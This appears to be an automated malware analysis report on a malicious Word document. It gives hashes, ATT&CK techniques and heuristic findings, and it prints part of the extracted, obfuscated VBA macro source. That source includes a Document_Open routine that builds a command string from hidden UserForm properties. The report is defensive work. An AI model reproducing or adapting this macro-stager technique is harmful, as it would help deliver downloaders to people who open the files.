Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c220378cb3994b0…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 206.8 KB
Created: 2019-12-19 13:26:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 18c83322405e103513aadf17af2bb50a
SHA-1: 73ae156db894fa1df68957ba917979b9e7ce6f22
SHA-256: 7c220378cb3994b0fc701621095ef8de8bce2fd46a87910fb0e228ed8e095d39
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and GetObject calls, along with a hidden UserForm command stager, strongly suggests the macro is designed to download and execute a second-stage payload. The specific obfuscation techniques used indicate a deliberate attempt to evade detection.

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13797 bytes
SHA-256: 675ba6f36ba020343c91c3a3cc7ef3e38554616fcb0cabbf86044af52d11c671
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Qriiuijee"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sywkvcfbn, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Piodbecawzfc = "Culpa quod recusandae rerum tenetur qui sint atque consequuntur quo."
Dim Clqttkurs As String
Dim Bqhqshzz As Double
Pvcftyhznrz = ("Repudiandae minus et tempora.")
Dim Wxgqzawyqcb As Integer
Dim Ujesfcdrnpo As Integer
Dim Lnreucmz As Boolean
Lqzyvsytafee = Vlwlzihsdzpi
Dim Hznpiqscfe As Integer
Ownhvhqwijfaz = ("Et atque velit occaecati rerum porro ad.")
Dim Tmajmkmmbr As String
Dim Gctfseaulevdh As Integer
Dim Dytnpfezpf As String
Objlpflktpdn = "Soluta ad quis sit quo eveniet."
Dim Iaoqwcuzjohez As String
Dim Cdayjmsb As Boolean
Dim Xwhrnugqq As String
Lyiszorv = ("Debitis perferendis.")
Dim Guirldpmnp As Boolean
Lyfniwtanjux = 554
Sfjybfour = Acrredhdqnjmm
Bdxwakagkjco = 786
Elfkrqozzsp
   Eerifoxbhfsv = "Et commodi dolorem reiciendis."
Dim Socqgypddt As Boolean
Dim Tghttehcemdlf As Double
Gqqimbjr = ("Numquam animi.")
Dim Rfaeaaxciuqt As Boolean
Dim Nnofgkrksv As String
Dim Nltvjpebczh As Double
Mgjwtmnc = Ynelsagnevnm
Dim Nlbpniogp As String
Ehnyivkjquhe = ("Totam.")
Dim Awmcdqzuaj As Boolean
Dim Xovgsxdros As Boolean
Dim Vzcdvnfgxdn As String
Dlkvjher = "Ut eius."
Dim Wnkcjbmxhdyhe As String
Dim Zmdaoubieomt As Integer
Dim Loxybgpkl As Integer
Kffjdwhwz = ("Juanita")
Dim Aqjduefoxhqt As Boolean
Bidhfobhvdp = 788
Brewwtrngoxlk = Yxulkuboeotvs
Gnyfextltzda = 760
End Sub

Attribute VB_Name = "Yuzjruliymop"
Attribute VB_Base = "0{65DE3A53-5B2E-411C-90FE-71FC5BF968A5}{8A793CE6-0864-4A8B-8D48-E0EA095415FE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ebwkpbwyfpq"
Function Jfrouscdsym()
   Yfwjefctgsplu = "Edmond"
Dim Btjqfjhcxphlk As Double
Dim Erqlthogoq As Integer
Poubfzeto = ("Ut quisquam quis eos.")
Dim Opqcyuwts As Double
Dim Oyuiaonnvzodr As Double
Dim Obmgewlj As Integer
Cfpmrxyktawgx = Fbyhamzovgv
Dim Szdosmxjxa As Boolean
Qsyoghem = ("Et.")
Dim Vncbjdrtgwqmr As Integer
Dim Hnkcgiatfjtaa As String
Dim Quuueqmrdtrdu As Boolean
Dbeqzuukkp = "Aperiam in accusamus omnis."
Dim Xspdreifvrxp As Double
Dim Wgioeflsfsvj As Double
Dim Wjjejwpy As Double
Azmcqldpjey = ("Sed qui deserunt.")
Dim Wlphemwh As Double
Ejmhtgkgxss = 364
Sjcupgzlf = Nstpkmrir
Teejjzybu = 328
Akohddomahcsv = Qriiuijee.Sywkvcfbn
   Ygwavknuysbki = "Rerum mollitia quibusdam recusandae."
Dim Jcaqogtuufap As Double
Dim Wzwllgve As Boolean
Fhrhxngvixg = ("Garry")
Dim Xnqemcuvvn As Double
Dim Sezxywfz As String
Dim Hpmxgzegcx As Boolean
Zxubjbirktb = Jgykbbaz
Dim Bspwvrols As Double
Ebcwmdqva = ("Et.")
Dim Gsxsfvawvnm As Integer
Dim Jufnawhizyef As String
Dim Oyjdlsnlwzc As Double
Kwjssjjnsxdv = "Odit."
Dim Fgusnjhmy As Integer
Dim Bzgxxglodx As String
Dim Gmwmavagihm As Integer
Cgobkyxyi = ("Exercitationem asperiores et assumenda non temporibus nihil iste qui.")
Dim Cqvrrgaitr As String
Rwhqyebtn = 751
Vawntzorxvmk = Ipbgdnno
Echztgxvdxzru = 288
Dexpcfjyh = Akohddomahcsv + Yuzjruliymop.Vfztfxqbyqd + Yuzjruliymop.Wlniqqbwveycp + Yuzjruliymop.Dnndzgkmrx
   Ofmuibzxhd = "Corrupti."
Dim Ybfkvcminuw As Double
Dim Idotgqme As String
Itpgwvvgljckl = ("Israel")
Dim Pyrnxtivt As Integer
Dim Ldbngjkcwrfvq As Boolean
Dim Olhyxsmnrrur As Double
Axvfyjsfx = Zifojcbzefwo
Dim Ezpkvlru As Integer
Tkqrdaindfykh = ("Soluta modi facilis nobis repudiandae omnis eum nobis.")
Dim Osrmzdjad As String
Dim Cvbscfjjvz As Integer
Dim Wewjlpeurq As Double
Szhzsjjmx = "May"
Dim Nlldsaydicivh As Boolean
Dim Ykyzsmtuzcxk As Boolean
Dim Pzndhjxzmm As String
Ntfkdawylyox = ("Deserunt.")
Dim Trmauphrtc As Inte
... (truncated)